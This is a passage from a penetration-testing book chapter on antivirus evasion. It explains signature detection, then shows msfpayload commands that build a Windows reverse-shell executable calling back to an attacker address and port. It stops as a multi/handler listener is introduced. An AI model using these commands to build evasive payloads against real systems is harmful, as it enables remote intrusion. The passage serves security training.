100

Chapter 7

signatures must be specific enough to trigger only when they encounter truly 
malicious programs, not legitimate software. This model is relatively easy to 
implement, yet it provides limited success in practice.

That being said, a lot of money is being made by antivirus publishers, 

and many smart and talented people work in the industry. If you plan to use 
a payload that is not custom built, you can expect that antivirus software will 
detect it.

To evade antivirus, we can create unique payloads to run on an antivirus 

software–protected system that will not match any of the available signatures. 
In addition, when we’re performing direct exploits on a system, Metasploit 
payloads are designed to run in memory and never to write data to the hard 
disk. When we send a payload as part of an exploit, most antivirus programs 
will not detect that it has been run on the target.

Rather than focus on specific commands in this chapter, we’ll focus on 

the underlying concepts. Consider the sorts of characteristics that might trig-
ger antivirus software, and try to use the techniques presented here to change 
sections of code so that they no longer match the antivirus signatures. Don’t 
be afraid to experiment.

Creating Stand-Alone Binaries with MSFpayload

Before we perform an antivirus evasion, let’s look at how to create stand-
alone Metasploit binary payloads with 

msfpayload

. For starters, we’ll create a 

simple reverse shell that connects back to the attacker and spawns a command 
shell. We’ll use 

msfpayload

 and 

windows/shell_reverse_tcp

. But first, let’s look at 

the available options for the 

shell_reverse_tcp

 payload using the 

O

 flag at  .

root@bt:/# 

msfpayload windows/shell_reverse_tcp O 

. . . SNIP . . .

Basic options:
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique: seh, thread, process
LHOST                      yes       The local address
LPORT     4444             yes       The local port

Now let’s run 

msfpayload

 again and provide the options needed to create 

this payload in the Windows Portable Executable (PE) format. To do so, we 
provide the 

X 

option as shown at   as our output format:

root@bt:/# 

msfpayload windows/shell_reverse_tcp LHOST=192.168.1.101 LPORT=31337 X   > 

/var/www/payload1.exe

root@bt:/# 

file /var/www/payload1.exe

var/www/payload1.exe: MS-DOS executable PE  for MS Windows (GUI) Intel 80386 32-bit

Now we have a working executable, so we can start a listener with the 

multi/handler

 module

 

in 

msfconsole

. 

multi/handler 

allows Metasploit to listen 

for reverse connections.